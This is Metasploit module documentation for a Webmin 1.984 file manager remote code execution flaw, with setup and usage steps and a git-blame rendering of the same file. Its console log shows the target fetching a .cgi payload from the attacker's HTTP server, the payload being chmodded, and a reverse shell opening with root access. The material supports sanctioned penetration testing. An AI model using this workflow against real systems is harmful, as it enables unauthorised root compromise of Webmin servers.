documentation/modules/exploit/linux/http/webmin_file_manager_rce.md

## Vulnerable Application

In Webmin v1.984, any authenticated low privilege user without access rights to the
File Manager module could interact with file manager functionalities such as downloading files from remote URLs and changing
file permissions (chmod). It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those
functionalities in the file manager.

### Setup, on Ubuntu 20.04

```
wget https://download.webmin.com/devel/deb/webmin_1.984_all.deb
sudo dpkg -i  webmin_1.984_all.deb
```

Webmin should now be installed. The credentials for the web UI will be the same as the
user that installed Webmin

## Options
### USERNAME
A specific username to authenticate as
### PASSWORD
A specific password to authenticate with

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/linux/http/webmin_file_manager_rce`
1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
1. Run the module
1. Receive a session as the `root` user.

## Scenarios
### Webmin 1.984, on Ubuntu 20.04

```
msf6 > exploit/linux/http/webmin_file_manager_rce
[*] Using exploit/linux/http/webmin_file_manager_rce
msf6 exploit(linux/http/webmin_file_manager_rce) > set password notpassword
password => notpassword
msf6 exploit(linux/http/webmin_file_manager_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(linux/http/webmin_file_manager_rce) > set rhosts 172.16.199.132
rhosts => 172.16.199.132
msf6 exploit(linux/http/webmin_file_manager_rce) > set username msfuser
username => msfuser
msf6 exploit(linux/http/webmin_file_manager_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://172.16.199.1:8080/tmBFT82mvsHD
[*] Attempting to authenticate with Webmin
[+] Authentication successful
[*] Downloading remote url
[*] Fetching payload from HTTP server
[*] Request 'GET /tmBFT82mvsHD.cgi'
[*] Sending payload ...
[*] Finished downloading remote url
[*] Modifying the permissions of the uploaded payload to 0755
[+] Deleted /usr/share/webmin/tmBFT82mvsHD.cgi
[*] Command shell session 9 opened (172.16.199.1:4444 -> 172.16.199.132:58058) at 2022-10-25 16:21:02 -0400
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
```
Finished TODOs and added docs 2022-10-24 18:53:21 -04:00			`## Vulnerable Application`

Update documentation/modules/exploit/linux/http/webmin_file_manager_rce.md 2022-10-25 15:12:26 -04:00			`In Webmin v1.984, any authenticated low privilege user without access rights to the`
			`File Manager module could interact with file manager functionalities such as downloading files from remote URLs and changing`
			`file permissions (chmod). It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those`
Finished TODOs and added docs 2022-10-24 18:53:21 -04:00			`functionalities in the file manager.`

			`### Setup, on Ubuntu 20.04`

			```
			`wget https://download.webmin.com/devel/deb/webmin_1.984_all.deb`
			`sudo dpkg -i webmin_1.984_all.deb`
			```

			`Webmin should now be installed. The credentials for the web UI will be the same as the`
			`user that installed Webmin`

			`## Options`
			`### USERNAME`
			`A specific username to authenticate as`
			`### PASSWORD`
			`A specific password to authenticate with`

			`## Verification Steps`

			`1. Start msfconsole`
Update documentation/modules/exploit/linux/http/webmin_file_manager_rce.md 2022-10-25 15:12:03 -04:00			1. Do: `use exploit/linux/http/webmin_file_manager_rce`
Finished TODOs and added docs 2022-10-24 18:53:21 -04:00			1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
			`1. Run the module`
			1. Receive a session as the `root` user.

			`## Scenarios`
			`### Webmin 1.984, on Ubuntu 20.04`

			```
			`msf6 > exploit/linux/http/webmin_file_manager_rce`
			`[*] Using exploit/linux/http/webmin_file_manager_rce`
			`msf6 exploit(linux/http/webmin_file_manager_rce) > set password notpassword`
			`password => notpassword`
			`msf6 exploit(linux/http/webmin_file_manager_rce) > set lhost 172.16.199.1`
			`lhost => 172.16.199.1`
			`msf6 exploit(linux/http/webmin_file_manager_rce) > set rhosts 172.16.199.132`
			`rhosts => 172.16.199.132`
			`msf6 exploit(linux/http/webmin_file_manager_rce) > set username msfuser`
			`username => msfuser`
			`msf6 exploit(linux/http/webmin_file_manager_rce) > run`

			`[*] Started reverse TCP handler on 172.16.199.1:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target appears to be vulnerable.`
Fix file cleanup 2022-10-25 16:24:27 -04:00			`[*] Using URL: http://172.16.199.1:8080/tmBFT82mvsHD`
Finished TODOs and added docs 2022-10-24 18:53:21 -04:00			`[*] Attempting to authenticate with Webmin`
			`[+] Authentication successful`
			`[*] Downloading remote url`
			`[*] Fetching payload from HTTP server`
Fix file cleanup 2022-10-25 16:24:27 -04:00			`[*] Request 'GET /tmBFT82mvsHD.cgi'`
Finished TODOs and added docs 2022-10-24 18:53:21 -04:00			`[*] Sending payload ...`
Fix file cleanup 2022-10-25 16:24:27 -04:00			`[*] Finished downloading remote url`
Finished TODOs and added docs 2022-10-24 18:53:21 -04:00			`[*] Modifying the permissions of the uploaded payload to 0755`
Fix file cleanup 2022-10-25 16:24:27 -04:00			`[+] Deleted /usr/share/webmin/tmBFT82mvsHD.cgi`
			`[*] Command shell session 9 opened (172.16.199.1:4444 -> 172.16.199.132:58058) at 2022-10-25 16:21:02 -0400`
Finished TODOs and added docs 2022-10-24 18:53:21 -04:00			`[*] Server stopped.`

			`id`
			`uid=0(root) gid=0(root) groups=0(root)`
			`uname -a`
			`Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux`
			```